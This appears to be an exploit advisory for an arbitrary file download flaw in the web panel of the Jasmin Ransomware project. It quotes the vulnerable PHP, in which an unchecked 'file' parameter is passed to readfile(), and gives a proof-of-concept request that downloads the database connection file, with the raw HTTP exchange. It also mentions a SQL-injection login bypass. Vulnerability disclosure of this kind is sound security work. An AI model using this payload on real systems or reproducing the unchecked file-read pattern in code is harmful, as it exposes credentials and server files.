# Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download # Google Dork: N/A # Date: 22-03-2025 # Exploit Author: bRpsd cy[at]live.no # Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware # Software Link: https://github.com/codesiddhant/Jasmin-Ransomware # Version: N/A # Tested on: MacOS local xampp Authentication can be easily bypassed due to SQL Injection as mentioned in: https://www.exploit-db.com/exploits/52091 Vulnerable file:Web Panel/download_file.php Vulnerable parameter:file Vulnerable code: <?php session_start(); if(!isset($_SESSION['username']) ){ header("Location: login.php"); } $file=$_GET['file']; if(!empty($file)){ // Define headers header("Cache-Control: public"); header("Content-Description: File Transfer"); header("Content-Disposition: attachment; filename=$file"); header("Content-Type: text/encoded"); header("Content-Transfer-Encoding: binary"); // Read the file readfile($file); exit; }else{ echo 'The file does not exist.'; } ?> Proof of concept: http://localhost/Jasmin-Ransomware/Web Panel/download_file.php?file=database/db_conection.php Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br, zstd Connection: keep-alive Cookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 GET: HTTP/1.1 200 OK Date: Sat, 22 Mar 2025 09:42:09 GMT Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1 X-Powered-By: PHP/7.4.29 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: public Pragma: no-cache Content-Description: File Transfer Content-Disposition: attachment; filename=database/db_conection.php Content-Transfer-Encoding: binary Content-Length: 95 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/encoded;charset=UTF-8